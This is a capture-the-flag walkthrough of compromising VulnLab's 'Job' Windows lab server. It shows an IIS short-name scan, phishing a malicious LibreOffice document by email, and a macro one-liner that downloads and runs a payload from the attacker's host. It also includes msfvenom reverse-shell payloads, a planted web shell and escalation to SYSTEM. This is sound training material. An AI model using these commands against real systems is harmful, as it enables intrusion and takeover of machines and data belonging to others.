VL-Job

Vulnlab Job: Exploiting Document Macros to Compromise Windows Web Server

In this detailed VulnLab walkthrough of the “Job” machine, we demonstrate how an insecure resume submission process can lead to full system compromise of a Windows-based web server. Starting with IIS short name vulnerability discovery, we leverage a job application portal’s request for LibreOffice documents to deliver malicious macros that establish initial access. The walkthrough progresses through lateral movement by exploiting developer group permissions to plant web shells, followed by service impersonation techniques for privilege escalation to SYSTEM. This step-by-step pentesting guide highlights the dangers of processing untrusted documents, insufficient application security controls, and improper service configurations in corporate environments.

Initial Enumeration

Initial port scan revealed several open ports:

PORT     STATE SERVICE       REASON          VERSION
25/tcp   open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 

Vulnerability Discovery

After noticing the IIS server, I decided to check for the IIS short name vulnerability using a specialized scanning tool:

java -jar iis_shortname_scanner.jar 2 20 http://10.10.94.31/

The scan revealed the server is vulnerable and identified some files:

Scanning...

Testing request method: "OPTIONS" with magic part: "/~1/.rem" ...
Early result: the target is probably vulnerable.
Early result: identified letters in names > A,D,E,H,I,L,N,O,P,S,T,X
Early result: identified letters in extensions > A,H,M,P,S,T
File: HELLO~1.ASP
Dir: ASPNET~1
File: INDEX~1.HTM
[\] INDEX~1.HTT
# IIS Short Name (8.3) Scanner version 2023.4 - scan initiated 2025/04/02 17:40:37
Target: http://10.10.94.31/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/.rem
|_ Extra information:
  |_ Number of sent requests: 444
  |_ Identified directories: 1
    |_ ASPNET~1
  |_ Identified files: 2
    |_ HELLO~1.ASP
      |_ Actual file name = HELLO
    |_ INDEX~1.HTM
      |_ Actual file name = INDEX

Using the discovered information, I accessed the HELLO.ASPX file:

curl http://10.10.94.31/HELLO.ASPX             

<html xmlns="www.w3.org/1999/xhtml">
<head><title>

</title></head>
<body>
        <form method="post" action="./HELLO.ASPX" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg0NTYxMzIxNWRksO0e53iBgOk1F32mZVsjTztyPJmhrJc1OInj8vzB5Gk=" />

<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="D4124C05" />
        <div>

        Hello World

        </div>
        </form>
</body>
</html> 

I discovered a message on the website stating: “Please send your application to career@job.local! We recently switched to using open source products - please send your cv as a libre office document.”

Initial Access Strategy

This presented an opportunity for exploitation through malicious ODT files. I decided to use Metasploit’s ODT template:

use fileformat/odt_badodt

To capture hashes, I set up Responder:

sudo responder -I tun0 -dwv

Then sent a malicious ODT file via email:

sudo swaks --to career@job.local --from fake@example.com --server 10.10.94.31 --attach @/root/.msf4/local/bad.odt --header "Application" --body "Hello i am a softwere developer and I would like to apply for the job"

After capturing the hash, I attempted to crack it:

hashcat hash9099.txt /usr/share/wordlists/rockyou.txt

Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JACK.BLACK::JOB:16c1cb50aabefdf2:b4ad21b5ac50c9dc89...000000
Time.Started.....: Wed Apr  2 18:41:19 2025 (7 secs)
Time.Estimated...: Wed Apr  2 18:41:26 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2066.3 kH/s (1.50ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 66c Util: 69%

Unfortunately, the hash cracking attempt was unsuccessful.

Alternative Approach - Macro Exploitation

I decided to create a malicious LibreOffice macro:

Getting a Shell

I set up a HoaxShell listener:

hoaxshell -s 10.8.5.195 --p 4444

Alternatively, we can create a DSVyper shell:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.5.195 LPORT=9091 -f raw -o shell.bin

For the macro, we’d use:

powershell IEX(IWR http://10.8.5.195/shell.exe -UseBasicParsing);

I sent the email with the malicious ODT file:

swaks --to career@job.local --header "Application CV" --body "Hello, I'm a software developer and i am searching for a job, please review my application." --attach @hello.odt --server 10.10.94.31

Privilege Escalation

I attempted reconnaissance using PowerUp:

PS C:\Users\jack.black\Desktop > curl http://10.8.5.195/PowerUp.ps1 -o PowerUp.ps1
PS C:\Users\jack.black\Desktop > dir
Directory: C:\Users\jack.black\Desktop
PS C:\Users\jack.black\Desktop > Import-Module ./PowerUp.ps1
PS C:\Users\jack.black\Desktop > Invoke-AllChecks

Results showed:

HijackablePath : C:\Users\jack.black\AppData\Local\Microsoft\WindowsApps\                                                                                                                                                                   
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Users\jack.black\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll'          
-Command '...' 

This approach didn’t yield results.
I noticed that user jack.black is in the developers group, which meant we could modify the webpage. I placed a webshell in the wwwroot folder:


Set up another HoaxShell listener:

hoaxshell -s 10.8.5.195 --port 4433

I pasted the HoaxShell command and got a new shell:

System Access

For obtaining full system access, I generated a Meterpreter payload:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.5.195 LPORT=9091 -f exe -o shell2.exe

I uploaded the payload and set up a multi/handler:

With the Meterpreter session established, I was able to escalate to SYSTEM:

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > shell
Process 1828 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot>whoami
whoami
nt authority\system

C:\inetpub\wwwroot>

Conclusion

The Job machine was successfully compromised by exploiting:

1. A vulnerability in how the server processes LibreOffice documents
2. Web server write permissions available to the compromised user
3. Service impersonation techniques for privilege escalation

https://api.vulnlab.com/api/v1/share?id=4fcb82b4-05e4-4b83-ac24-42fdc137a063